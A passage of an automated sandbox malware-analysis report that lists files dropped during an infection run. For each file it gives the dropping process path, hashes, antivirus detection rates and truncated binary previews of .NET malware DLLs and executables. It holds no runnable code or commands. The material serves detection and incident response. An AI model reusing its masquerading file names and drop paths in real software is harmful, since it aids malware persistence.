                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32256
                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23552
                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):46592
                                                                                                          Entropy (8bit):5.870612048031897
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23552
                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):69632
                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):46592
                                                                                                          Entropy (8bit):5.870612048031897
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33792
                                                                                                          Entropy (8bit):5.541771649974822
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):85504
                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32256
                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):69632
                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33792
                                                                                                          Entropy (8bit):5.541771649974822
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with very long lines (508), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):508
                                                                                                          Entropy (8bit):5.88364750750886
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:Td4xUukmnqLSjrXtKrgLCGMjMQf59r0kKqP:TdXukmwsj8jRf59r0kKqP
                                                                                                          MD5:B179665A2E8C5316FA604B018DB9133E
                                                                                                          SHA1:9E46331F9F2B4A6EB3F3CD82526DB3AD8545662A
                                                                                                          SHA-256:F0451D7775CA9F6488A31E553604BBD2E9AF1A4CCFB9C47E3C47C5E080338AC7
                                                                                                          SHA-512:A0EA9C0DAC4606FA394D9E400A22F13BD26E5019276F4F83F02A6DF9201E895310C686E675904F44A80A7FB5BE0E5AA60E1BE90D9DAD14B9B32A1F657FD8F137
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:kQZLLjbKO5aC6yp01aSFdQC0Y0zF3pNbyOEaF3ra3tfJL1ANVAEDvuBTNiwVuVQjr9NsuOv7s2Luv2pgzmt3kKpEMuNgHWqhc5bMoSdHOHU3iQiU3PfHlX9hTJf9BO0WMnSzac2gJmodzwf5M2m10i5E632fxdFAQ8r58s3bX989sfshnjxJl8gnrN3gjXtpgoM1Ek7d8Le1j6WaLV1Nq6YRbDNvzX1APScDT1cDmTLaeoEv1cVOfg9kQ4ZBXMolUdlReSHT2ykWv7xw9b4XBmetS1xZcbpapkFADwRiVBWq6nzSHmB5SRjs828mer1aIJrL2wtMKVB9PyxpCeRzZuIYAXCKyoDnK5hw6oaV2zv6PkcKFSk9ZBBYATKeujXfRYzTQAtXE67k9MJa51FfEDNI4Jvmd5lTbPo0uI3EjM5dEaZyKuj2d2aNLqZHPG4IVoIthSpw7B62ItEeu6ctWszjzapEtwzdSxIaSpR1Fw4c5iFbl5XSnKvmyi4G
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2025984
                                                                                                          Entropy (8bit):7.5739640210308465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xq9/4rTuPInOgODSegbQddnpKSVVvncFn8:xGPIr1UDhv
                                                                                                          MD5:77967721CE1C8B3F0EB800BD33527897
                                                                                                          SHA1:6CACE6DB7C38EC0F438B9D7A2A323A90E703A904
                                                                                                          SHA-256:524FDB6F99BA45BA54D3445BFFB08D32F63E0642516DA16D4B31B8BA22325BD7
                                                                                                          SHA-512:5C0C90952462704C879125EBF9102796608DD7D8722F84183706BCB4748057ED23894E00F1D6B078AB8D8E7089B818CF9FDE7090302E83B5D0431418EC833165
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.qg................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......L...|..............7............................................0..........(.... ........8........E....)...=.......*...8$...(.... ....~....{....:....& ....8....*(.... ........8....(.... ....~....{....:....& ....8........0.......... ........8........E........f...1...v...Z...8........~....(T...~....(X... ....?>... ....8....~....:*... ....~....{....:....& ....8....r...ps....z*...... ....8q...~....(L... .... .... ....s....~....(P....... ....~....{....:1...& ....8&.....(.
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with very long lines (883), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):883
                                                                                                          Entropy (8bit):5.896891979213714
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:RPfdTPlo+leH2olKiz8BsUDuJL/eDCc/fP4N5oSpHAc:LJo+GHYXBLDSL/eNsOSL
                                                                                                          MD5:C0AB8FD2B9F54B1DAC64125C3C74DBF9
                                                                                                          SHA1:43665D88BACE65356A128FF623E4F34033D712C3
                                                                                                          SHA-256:9BB6B72262DCA0D68AABED74AD7BB1906398EE73FF8E38162EED84108ABC29A6
                                                                                                          SHA-512:408DBAC76D534418BF96F0D193CDF706358161D94DB790B2410774578E653DB3B99CC66895F21155F95F57E10ACAEAB747058EB3C087D93A9240453DC8BDFEA2
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:f6FKr52LFmF13kwnXBUTFs0IOHkzN6az4vZ4px9nlUIgVg7d5gX03xxwF75jVC7JMQ7HK17jCqsvjTwsKG3rij6G8nzs2ZSiW9UFizSDjyyMFBMwKNYOJPlmT0JhCPrmYJYk8qJVyzItvtB6aChoBDZGXrvspuAUGMy5nmxeEDaTH11kzMG9rClUuRMR4bpDzxni4FTyPDk7nF8g0L2cnBmDleKWZgjmXWeUNSpu3SuocnrpSqbtiMaxLj7a46Zte7jRloShfIiVQ7l7wfDsEzEL6qIoUPz72AKeEaEnY3NanEhO8AnY3qoo3YV4goMQSlcPxG3WbaULmnh1J4pUlaDMWglpFJGtq6HBlRa1HR7dVdCP0dvm82p1iQ3RfNRSTlepffQ1dxNTdk03dVzlYeuyQPdUXJV3AoJu8WtVN3JLoWY7ZAxKYp4y0pYQB5eTbTTyaG4GleYeVjJ41g5XWLfUuV4T8dTSZztVDjgTFqi4RZcQfeYfAG6Qx8EFLlIIKGFf0y1R9lRqmlDV2nxeEyRS3dhEfaHeiatKT7armHfYyQnM4sNiynDWywmXQwvidxHL22B5NF17S3dmzVJwNjq4XWWgUDa0V65BIbTCrSUswFE5TAh5m9V3GNyfgekJoBmW7bdXCHF5O8IRSbNTffNWlB55nxfMrKDuds71gK2e3ZoIFhNFQRnJyQu6giuOm2OD4XykdVxVmscLWwzGka6ag46N7AV7Zo2ALkNrtml4dSgFxjktsnnL6yhAbkncAz580b9vjIX7zB6OX1ZXamPwArEXDNQI9I4oWiOVkyKkQqW52SmjLQBYkJ7JXmrV1O7qGR2ymExmbofUVIfvkq7tGfEMlF77GysBspykay7HdZ65ony
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2025984
                                                                                                          Entropy (8bit):7.5739640210308465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xq9/4rTuPInOgODSegbQddnpKSVVvncFn8:xGPIr1UDhv
                                                                                                          MD5:77967721CE1C8B3F0EB800BD33527897
                                                                                                          SHA1:6CACE6DB7C38EC0F438B9D7A2A323A90E703A904
                                                                                                          SHA-256:524FDB6F99BA45BA54D3445BFFB08D32F63E0642516DA16D4B31B8BA22325BD7
                                                                                                          SHA-512:5C0C90952462704C879125EBF9102796608DD7D8722F84183706BCB4748057ED23894E00F1D6B078AB8D8E7089B818CF9FDE7090302E83B5D0431418EC833165
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.qg................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......L...|..............7............................................0..........(.... ........8........E....)...=.......*...8$...(.... ....~....{....:....& ....8....*(.... ........8....(.... ....~....{....:....& ....8........0.......... ........8........E........f...1...v...Z...8........~....(T...~....(X... ....?>... ....8....~....:*... ....~....{....:....& ....8....r...ps....z*...... ....8q...~....(L... .... .... ....s....~....(P....... ....~....{....:1...& ....8&.....(.
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55
                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          File Type:MSVC .res
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1224
                                                                                                          Entropy (8bit):4.435108676655666
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
